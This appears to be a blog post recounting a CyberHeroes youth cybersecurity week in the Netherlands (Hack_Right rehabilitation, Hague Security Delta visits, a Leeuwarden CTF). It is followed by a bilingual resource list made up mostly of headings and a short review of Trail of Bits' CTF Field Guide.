Then, we had a CSI like challenge and a Police Patrol Boat Adventure. We were able to work on our social engineering skills and see the huge port of Rotterdam (largest in Europe).

On the afternoon, Floor Jansen and Marinus Boekelo joined us to present the Hack_Right initiative and explain the amazing take over of Hansa Market a dark web marketplace.
Hack Right is an initiative to help young hackers who commited a small crime, to get back in the right path and use their skills for ethical hacking.
It consists of 4 modules

  1. Restorative justice: if you commit a crime you break your connection with the victim to repair this boundary you have to do something for the community. In this module, cyber criminals are confronted with the damage and possibly even with the victims.
  2. Training: ethical and legal boundaries
  3. Coaching: personal connection between coach and offender. This involves providing longer guidance to the offender, linking them to someone from the community.
  4. Alternative: indicates the opportunities on the labour market and teaches young people where to develop their talents

(source: Floor Jansen’s talk and Mediawijzer’s article)

Day 4: Cybersprint at The Hague Security Delta and US Ambassador residence

In the morning, we worked on « Make it Smart » Maarten van Duivenbode introduced us to smart objects and how to use them. We were able to program lights and their colors.

In the afternoon, we visited Cybersprint at The Hague Security Delta. Cynthia Schouten made an introductive talk and gave us a tour of the campus. We visited: Hogeschool Leiden’s IOT lab, we were introduced to a mixed reality tool that aims to train student in forensics with simulated crime scenes

(source: Cyberheroes flickr)

Then, we visited Splendo that introduced us their smart bikelock project for X-bike.

After the tour, Peter van Eijk who works at the municipality of the Hague presented the Hack Den Haag CTF. A CTF to help the city of the Hague to be more secure.
Finally, Soufian El Yadmani made an amazing talk about his adventure to cybersecurity. He explained that he was hired as a cybersecurity analyst at Cybersprint by winning a CTF. His team and him travel to many CTF competitions.
His secret to be a good ethical hacker? Practice, practice, practice!

After our visit to The Hague Security Delta Campus we went to the US Ambassador’s residence for a reception for the Cyberheroes program. There, Peter Hoekstra the Ambassador of the US, Anouk Vos from Cyberworkplace and Charles Ashley III from Cultivating Coders talked. The Ambassador, is now a proud hacker in a beautiful Cyberworkplace hoodie and the owner of a CyberHeroes medal!

(source: Cyberheroes flickr)

Day 5 and 6: Trip to Leeuwarden, no escape possible

(source: Cyberheroes flickr)

On the last two days of CyberHeroes, we were invited to Leeuwarden for a CTF at the amazing Hacklab.
Leeuwarden is a beautiful historical city in the north of Netherlands that has been European Capital of 2018.
The CTF gave us the opportunity to learn a lot.
After all this hacking, we did we had to go to jail… joking we just spent the night in a former prison: Alibi Hostel

But before going to sleep, we took part in a great escape game made by Henk Van Ee founder of Cybersafety4U in which we had to unlock a hacker’s phone.

(source: Cyberheroes flickr)

To conclude this awesome week, we all got a certificate and a CyberHeroes medal.
Needless to way i was very proud to participate and help for this great adventure.
I would like to take the time to thank Radically Open Security (Melanie and Anh) without whom i would not have heard about Cyberworkplace.
Thanks also to Anouk, Nasya and Maria from Cyberworkplace that welcomed me for this week.
They all made an amazing work and i would definetely recommend everyone who has the opportunity to take part in a week like this.
Volunteer or help Cyberworkplace any way you can, they do such an amazing work for students and cybersecurity lovers.

(source: Cyberheroes flickr) Volunteers for the CyberHeroes week: Adelle, Anh, Maria, Anouk, Me, Nasya

To go further:

Ressources / Resources


This list is still in progress, stay tuned to read an improved version.


Sensibilisation ou initiation / Awarness or introduction



Reverse Engineering

Software – IOT – Security Dev



Cybersécurité hollistique / Hollistic Cybersecurity

Cryptographie / Cryptography

Données / Data


Réseaux et sécurité des réseaux / Networks and networks’ security


Videos and webinars

Pentest – Bug bounty

Software – IOT – Security Dev

Hollistic Cybersecurity

Conferences – Communities


CTF writeups




Learning by doing

CTF Platforms


Vulnerable labs to set up or vulnerable websites

Games for awarness


Resources for noobs

Other lists of resources for CTF

Resources for game creation

Create CTF

Awarness or training for organizations

Ouvrages, articles de référence, sites, tutoriels, associations, conférences et blogs utiles / Books, papers, articles, useful websites, tutorials, communities, conferences and blogs

Lois et normes / Law and Policy


Economie / Economy

Cryptographie, mathématiques / Cryptography, maths

Systèmes d’exploitations / Operating System


Géopolitique / Geopolitical

Surveillance, protection des données, fuite de données / Surveillance, Personal Data protection, data leaks

Techniques et outils de cybersécurité, Conférences, Ressources pour apprendre / Cybersecurity techniques and tools, Conventions, learning resources

Initiation à la cybersécurité ou outils pédagogiques d’initiation/ Initiation to cybersecurity or initiation tools

Social Engineering


Labos et machines virtuelles / Labs and virtual machines

Humanités Numériques / Digital Humanities

Développement d’application, reverse engineering, revue de code / Software development, reverse engineering, code review

Evènements / Events

Bug bounty platforms

CTF Field Guide by Trail of Bits

What is Trail of Bits?
trail of bits logo
Trail of Bits is an independent information security company that aims to build better security for organizations over the world.
You can learn more about them here

When you want to learn more about how to become an ethical hacker and how to get your hands dirty and start to practice it is quite hard to know where to start.
Of course you have plenty of information online but it’s hard to find a way to start from scratch.
The CTF Field Guide will explain everything in a very structured way and you’ll  find plenty of resources (books, CTF, wargames, websites, courses,… ).
Also you’ll be able to learn the differences between CTF and Wargames  and the basics you should know about those.
Besides, they explain what type of Employers you have in the field and what kind of jobs. This is  a good point because I had quite a hard time to find a proper knowledge about this. I was only able to find out more when I talked to professionals and experts in the field.
Furthermore they make a good point in the chapter about certification. I let you find out about it but it made me think and reform my challenge.
When you’ll be done reading the intro you’ll have a great base to continue the practice in a well structured way with few main themes: Vulnerability discovery, Exploit Creation, Forensics, Toolkit Creation and Operational Tradecraft.

To conclude, I would totally recommend this guide if you are the kind of person who like to learn things in a structured manner. Also you’ll find a bunch of great advise.